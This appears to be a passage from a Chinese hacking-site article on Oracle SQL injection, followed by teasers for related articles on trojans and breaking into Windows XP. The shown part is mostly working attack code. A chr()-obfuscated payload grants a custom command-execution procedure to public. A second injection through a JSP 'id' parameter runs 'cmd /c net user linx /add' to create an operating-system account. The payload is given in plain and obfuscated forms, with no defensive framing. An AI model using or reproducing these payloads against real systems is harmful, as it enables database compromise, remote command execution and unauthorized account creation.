犀利的 oracle 注入技术_企业安全

hr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||
　　chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(103)||chr(114)||chr(97)||chr(110)||chr(116)||chr(32)||chr(97)||chr(108)||chr(108)||chr(32)||chr(111)||chr(110)||chr(32)||chr(76)||chr(105)||
　　chr(110)||chr(120)||chr(82)||chr(117)||chr(110)||chr(67)||chr(77)||chr(68)||chr(32)||chr(116)||chr(111)||chr(32)||chr(112)||chr(117)||chr(98)||chr(108)||chr(105)||chr(99)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||
　　chr(59)||chr(45)||chr(45)
　　,chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
　　5.执行命令：
　　/xxx.jsp?id=1 and chr(49)<>chr(32)||(
　　select sys.linxruncmd('cmd /c net user linx /add') from dual
　　)
　　即
　　/xxx.jsp?id=1 and chr(49)<>chr(32)||(
　　select sys.linxruncmd(chr(99)||chr(109)||chr(100)||chr(32)||chr(47)||chr(99)||chr(32)||chr(110)||chr(101)||chr(116)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(32)||chr(47)||chr(97)||chr(100)||chr(100)) from dual
　　)

木马连接原理

木马连接原理　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他噶端口。而我们要知道距噶IP，先可以连接他。123就是他机器上开的端口　... [阅读全文]

高手支招:通过进程抓马

高手支招:通过进程抓马　对于进程这个概念，许多电脑用户都没有给予太多关注。在很多人印象里，只知道结束进程可以杀死程序，至于哪些进程对应哪些程序，究竟什么样的进... [阅读全文]

如何多开QQ游戏大厅

如何多开QQ游戏大厅用WinHEX打开QQ游戏目录Tencent＼QQGame＼common＼Utility.dll文件　　搜索3DB70000008BCE... [阅读全文]

汗颜:黑客居然这样保护自己的电脑

汗颜:黑客居然这样保护自己的电脑看了你昨天的留言，我才知道原来木马可以用这么多方式传播呀。那我想问你一件事，常在河边走，哪有不湿鞋，你经常黑别人，难道就没有... [阅读全文]

黑客教你7招秘籍入侵xp系统

黑客教你7招秘籍入侵xp系统　第一招:屏幕保护　　在Windows中启用了屏幕保护之后，只要我们离开计算机(或者不操作计算机)的时间达到预设的时间，系统... [阅读全文]

“回收站”使用技巧集锦

“回收站”使用技巧集锦　★巧用“回收站”的“编辑”菜单　　如果要删除“回收站”中的大... [阅读全文]


验证码：

验证码：

犀利的 oracle 注入技术

2009年06月09日 • 企业安全 •我要评论

相关文章:

发表评论